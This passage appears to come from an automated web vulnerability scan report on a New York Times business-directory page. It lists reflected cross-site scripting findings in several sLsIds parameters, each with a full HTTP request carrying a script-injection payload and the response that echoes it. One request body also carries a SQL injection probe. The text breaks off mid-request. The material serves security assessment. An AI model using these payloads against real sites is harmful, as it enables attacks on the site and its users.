4.285. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsF parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsF request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f5b3"><script>alert(1)</script>f05370afb37ca0a58 was submitted in the sLsIdsF parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-5568703f5b3"><script>alert(1)</script>f05370afb37ca0a58&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91535
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADQTTDT=PANHKJGADLMKJOHFHOCPLMGM; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsF" value="125-463922,125-464100,125-488817,125-557391,125-522086,125-548195,125-553895,125-558344,125-564715,125-5568703f5b3"><script>alert(1)</script>f05370afb37ca0a58">
...[SNIP]...

4.286. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsG request parameter is copied into the HTML document as plain text between tags. The payload e3e59<script>alert(1)</script>bd5f6c43d5d was submitted in the sLsIdsG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828e3e59<script>alert(1)</script>bd5f6c43d5d&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:37:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828e3e59<script>alert(1)</script>bd5f6c43d5d&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-
...[SNIP]...

4.287. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsG request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db18a"><script>alert(1)</script>b4bd7219e002135d9 was submitted in the sLsIdsG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828db18a"><script>alert(1)</script>b4bd7219e002135d9&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91520
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCBSSQAT=LENKJLNDIPINGOFCPHMDGPBB; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsG" value="125-554611,125-518058,125-532291,125-532292,125-482057,125-569094,125-555551,125-462478,125-469804,125-500828db18a"><script>alert(1)</script>b4bd7219e002135d9">
...[SNIP]...

4.288. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsH parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsH request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1929f"><script>alert(1)</script>8a0fd96b74786c06 was submitted in the sLsIdsH parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-5334501929f"><script>alert(1)</script>8a0fd96b74786c06&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c1